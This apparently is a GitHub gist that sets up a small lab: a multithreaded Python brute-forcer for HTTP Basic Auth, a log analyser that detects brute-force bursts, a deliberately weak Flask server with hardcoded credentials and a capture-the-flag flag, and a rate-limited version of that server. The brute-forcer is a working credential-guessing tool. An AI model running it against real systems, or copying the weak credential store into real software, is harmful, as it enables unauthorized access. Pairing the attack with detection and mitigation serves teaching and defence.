Last active
November 4, 2025 14:04
-
-
Save Prosen-Ghosh/71165df671c0b3f0e82c80c853333015 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import requests | |
| from requests.auth import HTTPBasicAuth | |
| import argparse | |
| import sys | |
| from concurrent.futures import ThreadPoolExecutor, as_completed | |
| from time import sleep | |
| import logging | |
| requests.packages.urllib3.disable_warnings() | |
| logging.basicConfig( | |
| level=logging.INFO, | |
| format='%(asctime)s - %(levelname)s - %(message)s' | |
| ) | |
| class BasicAuthBruteForcer: | |
| def __init__(self, target_url, users_file, passwords_file, threads=5, delay=0): | |
| self.target_url = target_url | |
| # self.users = users_file | |
| # self.passwords = passwords_file | |
| self.threads = threads | |
| self.delay = delay | |
| self.found_credentials = [] | |
| self.users = self.load_file(users_file) | |
| self.passwords = self.load_file(passwords_file) | |
| def load_file(self, filepath): | |
| if not os.path.exists(filepath): | |
| raise FileNotFoundError(f"File '{filepath}' does not exist") | |
| if not os.path.isfile(filepath): | |
| raise ValueError(f"'{filepath}' is not a file") | |
| file_size = os.path.getsize(filepath) | |
| if file_size == 0: | |
| raise ValueError(f"File '{filepath}' is empty") | |
| if not os.access(filepath, os.R_OK): | |
| raise PermissionError(f"No read permission for '{filepath}'") | |
| try: | |
| with open(filepath, 'r') as f: | |
| return [line.strip() for line in f if line.strip()] | |
| except Exception as e: | |
| logging.error(f"Error loading file {filepath}: {e}") | |
| sys.exit(1) | |
| def try_credentials(self, username, password): | |
| try: | |
| response = requests.get( | |
| self.target_url, | |
| auth=HTTPBasicAuth(username, password), | |
| timeout=5, | |
| ) | |
| if response.status_code == 200: | |
| logging.info(f'[SUCCESS] {username}:{password}') | |
| self.found_credentials.append((username, password)) | |
| return True | |
| else: | |
| logging.debug(f'[FAILURE] {username}:{password} - Status Code: {response.status_code}') | |
| return False | |
| except requests.exceptions.RequestException as e: | |
| logging.error(f"Request error for {username}:{password} - {e}") | |
| return False | |
| def run(self): | |
| total_attempts = len(self.users) * len(self.passwords) | |
| logging.info(f'Starting brute-force attack on {self.target_url} with {total_attempts} attempts.') | |
| attempts = 0 | |
| with ThreadPoolExecutor(max_workers=self.threads) as executor: | |
| futures = [] | |
| for user in self.users: | |
| print(f"[INFO] Trying user: {user}") | |
| for password in self.passwords: | |
| futures.append( | |
| executor.submit(self.try_credentials, user, password) | |
| ) | |
| if self.delay > 0: | |
| sleep(self.delay) | |
| for future in as_completed(futures): | |
| attempts += 1 | |
| if attempts % 10 == 0: | |
| logging.info(f'Progress: {attempts}/{total_attempts} attempts made.') | |
| logging.info(f"\n{'=' *100}") | |
| logging.info(f"Brute-force attack completed: {len(self.found_credentials)} valid credentials found.") | |
| if self.found_credentials: | |
| logging.info("\nValid credentials:") | |
| for user, pwd in self.found_credentials: | |
| logging.info(f' - {user}:{pwd}') | |
| return self.found_credentials | |
| def main(): | |
| parser = argparse.ArgumentParser(description='HTTP Basic Auth Brute-Forcer') | |
| parser.add_argument('-u', '--url', required=True, help='Target URL') | |
| parser.add_argument('-U', '--users', required=True, help='Users wordlist file') | |
| parser.add_argument('-P', '--passwords', required=True, help='Passwords wordlist file') | |
| parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads') | |
| parser.add_argument('-d', '--delay', type=float, default=0, help='Delay between requests (seconds)') | |
| args = parser.parse_args() | |
| bruteforcer = BasicAuthBruteForcer( | |
| args.url, | |
| args.users, | |
| args.passwords, | |
| args.threads, | |
| args.delay | |
| ) | |
| bruteforcer.run() | |
| if __name__ == '__main__': | |
| main() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from collections import defaultdict | |
| from datetime import datetime, timedelta | |
| def analyze_auth_log(log_file, threshold=10, time_window=60): | |
| failures = defaultdict(list) | |
| print(f"[*] Analyzing log file: {log_file}") | |
| print(f"[*] Threshold: {threshold} failures within {time_window} seconds\n") | |
| with open(log_file, 'r') as f: | |
| for line in f: | |
| if 'AUTH_FAILURE' in line: | |
| match = re.search(r'AUTH_FAILURE\|([^|]+)\|([^|]+)\|(.+)', line) | |
| if match: | |
| ip = match.group(1) | |
| username = match.group(2) | |
| timestamp_str = match.group(3) | |
| try: | |
| timestamp = datetime.fromisoformat(timestamp_str) | |
| failures[ip].append((timestamp, username)) | |
| except ValueError: | |
| print(f"[!] Invalid timestamp format: {timestamp_str}") | |
| continue | |
| alerts = [] | |
| for ip, events in failures.items(): | |
| events.sort(key=lambda x: x[0]) | |
| for i in range(len(events)): | |
| window_start = events[i][0] | |
| window_end = window_start + timedelta(seconds=time_window) | |
| failures_in_window = [e for e in events if window_start <= e[0] <= window_end] | |
| if len(failures_in_window) >= threshold: | |
| usernames = set([e[1] for e in failures_in_window]) | |
| alerts.append({ | |
| 'ip': ip, | |
| 'failure_count': len(failures_in_window), | |
| 'time_start': window_start, | |
| 'time_end': window_end, | |
| 'usernames_tried': usernames | |
| }) | |
| break | |
| if alerts: | |
| print(f"[!] ALERT: {len(alerts)} potential brute-force attacks detected:\n") | |
| for alert in alerts: | |
| print(f"[!] IP: {alert['ip']}") | |
| print(f" Failures: {alert['failure_count']}") | |
| print(f" Time window: {alert['time_start']} to {alert['time_end']}") | |
| print(f" Usernames tried: {', '.join(alert['usernames_tried'])}") | |
| print() | |
| else: | |
| print("[*] No brute-force attacks detected.") | |
| return alerts | |
| if __name__ == '__main__': | |
| import sys | |
| if len(sys.argv) < 2: | |
| print("[!] Usage: python detect_bruteforce.py <log_file>") | |
| sys.exit(1) | |
| log_file = sys.argv[1] | |
| analyze_auth_log(log_file) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from flask import Flask, request, jsonify, Response | |
| import logging | |
| from datetime import datetime | |
| app = Flask(__name__) | |
| # Configure logging | |
| logging.basicConfig( | |
| filename='/var/log/auth.log', | |
| level=logging.INFO, | |
| format='%(asctime)s - %(message)s' | |
| ) | |
| VALID_USERS = { | |
| 'admin': 'admin123', | |
| 'user': 'password', | |
| 'test': 'test123', | |
| 'root': '123456' | |
| } | |
| def check_auth(username, password): | |
| return VALID_USERS.get(username) == password | |
| def authenticate(): | |
| return Response( | |
| 'Authentication required', 401, | |
| {'WWW-Authenticate': 'Basic realm="Login Required"'} | |
| ) | |
| @app.route('/api/protected', methods=['GET']) | |
| def protected_resource(): | |
| auth = request.authorization | |
| if auth: | |
| logging.info(f'AUTH_ATTEMPT|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}') | |
| if not auth or not check_auth(auth.username, auth.password): | |
| if auth: | |
| logging.info(f'AUTH_FAILURE|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}') | |
| return authenticate() | |
| logging.info(f'AUTH_SUCCESS|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}') | |
| return jsonify({ | |
| 'message': 'Access granted', | |
| 'user': auth.username, | |
| 'secret': 'FLAG{basic_auth_cracked}' | |
| }) | |
| @app.route('/health', methods=['GET']) | |
| def health(): | |
| return jsonify({'status': 'ok'}) | |
| if __name__ == '__main__': | |
| app.run( | |
| host='0.0.0.0', | |
| port=5001, | |
| debug=False | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from flask import Flask, request, jsonify, Response | |
| import logging | |
| from datetime import datetime | |
| from flask_limiter import Limiter | |
| from flask_limiter.util import get_remote_address | |
| app = Flask(__name__) | |
| limiter = Limiter( | |
| app=app, | |
| key_func=get_remote_address, | |
| default_limits=["200 per day", "50 per hour"], | |
| storage_uri="memory://" | |
| ) | |
| # Configure logging | |
| logging.basicConfig( | |
| filename='/var/log/auth.log', | |
| level=logging.INFO, | |
| format='%(asctime)s - %(message)s' | |
| ) | |
| VALID_USERS = { | |
| 'admin': 'admin123', | |
| 'user': 'password', | |
| 'test': 'test123', | |
| 'root': '123456' | |
| } | |
| def check_auth(username, password): | |
| return VALID_USERS.get(username) == password | |
| def authenticate(): | |
| return Response( | |
| 'Authentication required', 401, | |
| {'WWW-Authenticate': 'Basic realm="Login Required"'} | |
| ) | |
| @app.route('/api/protected', methods=['GET']) | |
| @limiter.limit("10 per minute") | |
| def protected_resource(): | |
| auth = request.authorization | |
| if auth: | |
| logging.info(f'AUTH_ATTEMPT|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}') | |
| if not auth or not check_auth(auth.username, auth.password): | |
| if auth: | |
| logging.info(f'AUTH_FAILURE|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}') | |
| return authenticate() | |
| logging.info(f'AUTH_SUCCESS|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}') | |
| return jsonify({ | |
| 'message': 'Access granted', | |
| 'user': auth.username, | |
| 'secret': 'FLAG{basic_auth_cracked}' | |
| }) | |
| @app.route('/health', methods=['GET']) | |
| def health(): | |
| return jsonify({'status': 'ok'}) | |
| if __name__ == '__main__': | |
| app.run( | |
| host='0.0.0.0', | |
| port=5001, | |
| debug=False | |
| ) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment